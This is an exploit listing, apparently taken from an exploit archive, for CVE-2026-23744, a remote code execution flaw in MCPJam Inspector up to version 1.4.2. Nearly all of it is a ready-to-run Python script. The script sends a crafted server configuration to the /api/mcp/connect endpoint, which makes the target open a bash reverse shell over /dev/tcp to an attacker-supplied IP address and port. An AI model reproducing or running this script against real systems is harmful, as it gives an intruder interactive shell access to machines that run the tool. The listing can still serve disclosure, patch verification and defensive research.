Share
## https://sploitus.com/exploit?id=PACKETSTORM:225292
# Exploit Title: MCPJam Inspector - Remote Code Execution 
    # Date: 07/03/2026
    # Exploit Author: Diamorphine
    # Vendor Homepage: https://www.mcpjam.com/
    # Software Link: https://github.com/MCPJam
    # Version: <=1.4.2
    # Tested on: Debian
    # CVE : CVE-2026-23744
    
    
    import asyncio
    import httpx
    import argparse
    from urllib.parse import urljoin
    
    
    async def main(attacker_ip, attacker_port, url):
        async with httpx.AsyncClient(verify=False) as client:
            data = {
                "serverConfig": {
                    "command": "bash",
                    "args": ["-c", f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"],
                    "env": {}
                },
                "serverId": "Hello666"
            }
            
            ready_url = urljoin(url, "/api/mcp/connect")
            r = await client.post(url=ready_url, json=data)
            print(r.text)
    
    parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution")
    
    parser.add_argument("-u", "--url", required=True, help="Target host. e.g. http://127.0.0.1:8080")
    parser.add_argument("-l", "--lhost", required=True, help="Attacker ip")
    parser.add_argument("-p", "--lport", required=True, help="Attacker port")
    
    args = parser.parse_args()
    
    if __name__ == '__main__':
        asyncio.run(main(args.lhost, args.lport, args.url))